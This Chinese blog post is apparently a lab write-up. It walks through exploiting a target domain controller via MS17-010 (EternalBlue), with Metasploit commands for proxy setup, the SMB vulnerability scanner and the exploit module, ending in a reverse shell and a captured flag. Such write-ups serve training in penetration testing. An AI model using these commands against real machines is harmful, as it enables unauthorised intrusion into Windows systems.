EP-WinServerDC - HYH

公告

欢迎来到HYH的网站！

最近评论

hyh on HTB-Certified: “建议重置靶机。” 1 月 17, 12:20
hyh on 留言板: “这是机器默认给的信息，在开机那里仔细看看” 1 月 17, 12:15
a on HTB-Certified: “这个什么情况:( dacledit.py…” 1 月 17, 11:21
mdh on 留言板: “请问在 HTB-EscapeTwo 这篇…” 1 月 17, 10:34
nunyabizness on 留言板: “love your site and t…” 1 月 17, 07:48
hyh on 留言板: “这几天在屯文章，后面会一并发表。。。都是…” 1 月 16, 12:24

2024-11-16 13:03

|

307

|

0

|

2024-12-14 11:04

|

204 字

|

2 分钟

前言

本文是在8086那篇文章已经搭建好代理的情况下进行的

漏洞扫描

利用web01上的fscan对DC主机进行扫描，发现疑似存在MS17-010漏洞

进入MSF，设置全局代理以及反向允许

setg Proxies socks5:127.0.0.1:46075
set ReverseAllowProxy true

选取探测模块

use auxiliary/scanner/smb/smb_ms17_010
set rhost 172.22.10.11

可以看到探测模块显示该靶机好像存在永恒之蓝漏洞

接下来进一步攻击

MS17-010

search ms17-010
use 10

注意这里不要选取第0个模块，经过我的尝试使用他会导致靶机直接蓝屏

这里用第10个

配置如图

可以看到反弹成功，不用提权

直接就能读取到Admin目录下的flag

Windows 工程实践

暂无评论

发送评论编辑评论

Markdown

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!

节

春

节

春